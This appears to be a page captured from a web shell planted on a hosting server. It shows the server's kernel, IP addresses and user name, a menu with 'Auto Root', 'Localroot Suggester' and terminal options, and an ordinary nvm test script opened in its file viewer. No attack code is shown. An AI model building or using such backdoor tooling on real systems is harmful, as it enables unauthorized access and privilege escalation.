Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
test /
sourcing /
Delete
Unzip
Name
Size
Permission
Date
Action
Sourcing nvm.sh global alias bug
863
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh should keep version if one is active
592
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh should use the default if available and no nvm node is loaded
1.13
KB
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh with --install and .nvmrc should install it
850
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh with --install should install the default
1
KB
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh with --no-use should not use anything
992
B
-rwxrwxr-x
2025-06-22 16:20
Sourcing nvm.sh with no default should return 0
314
B
-rwxrwxr-x
2025-06-22 16:20
setup
373
B
-rwxrwxr-x
2025-06-22 16:20
teardown
112
B
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
#!/bin/sh die () { echo "$@" ; exit 1; } \. ../common.sh # We need to unload nvm again first, as by the time this test is run, # despite being unloaded in setup, the inherited PATH still contains # an nvm-installed node version. We have to reset NVM_DIR after the unload. \. ../../nvm.sh || die 'sourcing returned nonzero exit code' NVM_DIR_CACHED="$NVM_DIR" nvm unload || die 'unloading returned nonzero exit code' NVM_DIR="$NVM_DIR_CACHED" echo '0.10.1' > ../../alias/default || die 'creation of default alias failed' # Now to begin the real test \. ../../nvm.sh || die 'sourcing returned nonzero exit code' NVM_LS_CURRENT_NOT_GREPPED="$(nvm ls current | strip_colors)" NVM_LS_CURRENT="$(nvm ls current | strip_colors | \grep -o v0.10.1)" [ "_$NVM_LS_CURRENT" = '_v0.10.1' ] || die "'nvm ls current' did not return '-> v0.10.1', got '$NVM_LS_CURRENT_NOT_GREPPED'" # NVM_LS_CURRENT_COLORED="$(nvm ls current | sed -n l)" NVM_ALIAS_DEFAULT="$(nvm alias default | strip_colors)" [ "_$NVM_ALIAS_DEFAULT" = "_default -> 0.10.1 (-> v0.10.1)" ] \ || die "'nvm alias default did not return 'default -> 0.10.1 (-> v0.10.1)', got '$NVM_ALIAS_DEFAULT'"